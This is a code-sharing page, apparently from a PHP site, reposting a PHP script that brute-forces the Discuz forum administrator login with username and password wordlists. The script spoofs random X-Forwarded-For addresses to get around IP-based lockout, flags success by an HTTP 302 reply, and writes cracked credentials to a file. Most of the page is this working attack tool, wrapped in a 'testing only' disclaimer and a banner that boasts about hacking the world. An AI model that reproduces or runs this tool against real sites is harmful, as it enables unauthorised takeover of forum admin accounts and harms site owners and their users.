爆破DIscuz后台的代码,可突破ip限制
- WBOYOriginal
- 2016-06-06 19:35:532099browse
自己写的,爆破discuz后台的,基于字典的,仅供测试。勿用于非法用途 PHP ?php/**Author : fengxuanDate : 2014-11-23 */class FuckDiscuz{public $userfile;public $passfile;public $outfile;public $url;public function __construct($argv,$argc){$this-i
自己写的,爆破discuz后台的,基于字典的,仅供测试。勿用于非法用途 PHP
<?php
/**
Author : fengxuan
Date : 2014-11-23
*/
class FuckDiscuz{
public $userfile;
public $passfile;
public $outfile;
public $url;
public function __construct($argv,$argc){
$this->init($argv,$argc);
$this->crack();
}
private function init($argv,$argc){
if(!isset($argv) || $argc != 7 || $argv[1]!='-v' || $argv[2]!='-o' ) $this->show();
$this->userfile = $argv[count($argv)-2];
$this->passfile = $argv[count($argv)-1];
$this->outfile = $argv[3];
$this->url = $argv[count($argv)-3];
}
private function sock_post($url,$query){
$info = parse_url($url);
$fp = fsockopen($info['host'],80,$error,$errstr,30);
$head = "POST ".$info['path']." HTTP/1.0\r\n";
$head .= "HOST: ".$info['host']."\r\n";
$head .= "X-Forwarded-For: ".$this->X_Forwarded_for()."\r\n";
$head .="Content-type: application/x-www-form-urlencoded\r\n";
$head .= "Content-Length: ".strlen(trim($query))."\r\n";
$head .= "\r\n";
$head .= trim($query);
$write = fputs($fp, $head);
while (!feof($fp)){
$line = fgets($fp);
if(preg_match('/HTTP\/1.1 302/i', $line)){
$temp = explode('&', $query);
$temp[0] = substr(strstr($temp[0], '='), 1);
$temp[1] = substr(strstr($temp[1], '='), 1);
echo "\r\n\r\nCongratulations! \r\nThe username is \r\n".$temp[0]." and password is \r\n".$temp[1]."\r\n";
$this->savefile($this->outfile, $temp[0] , $temp[1] );
}
//echo $line."<br>";
}
}
private function X_Forwarded_for(){
$xip = rand(1, 255).".".rand(0, 255).".".rand(0, 255).".".rand(1, 254);
if (preg_match('#^(10|172\.16|192\.168)\.#', $xip)) {
continue;
}
return $xip;
}
private function savefile($file,$user,$pass){
$fp = fopen($file, 'w+');
$string = "username ".$user." password ".$pass."\r\n";
fwrite($fp, $string);
fclose($fp);
}
private function crack(){
$userfile = file($this->userfile);
$passfile = file($this->passfile);
$userarr = array();
$passarr = array();
foreach ($userfile as $user=>$value){
$userarr[$user] = $value;
foreach ($passfile as $pass=>$value){
$passarr[$pass] = $value;
$data = array(
'admin_username'=>$userarr[$user],
'admin_password'=>$passarr[$pass],
'submit'=>'提交'
);
print "Try crack with: \t".$userarr[$user]." and \t".$passarr[$pass]." \r\n";
$data = str_replace('%0D%0A', '',http_build_query($data));
$this->sock_post($this->url, $data);
}
}
}
private function show(){
$string = <<<eof
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+----------Writed by 风炫 Date:2014/11/25------------------+
+-------如果有能力,即使黑了全世界又如何?------------------+
+If there are any problems,please contact:978348306@qq.com-+
+-----we from moon security team blog:www.moonsec.com------+
+----------------只供测试所用,请勿用于非法用途-------------+
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
usage: fuckdz.php <commands> <url> <userfile> <passfile>
<commands>
-v : According to cracking process
-o [file] : The output file to save
eg:
php.exe fuckdz.php -v -o result.txt http://www.xxx.com/admin.php user.txt pass.txt
eof;
print $string;
exit();
}
}
new FuckDiscuz($argv,$argc);
?>
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Previous article:我也分享一个PHP加密解密的类Next article:PHP高效文件缓存类FCache!貌似已经很多了,但是还是忍不住发了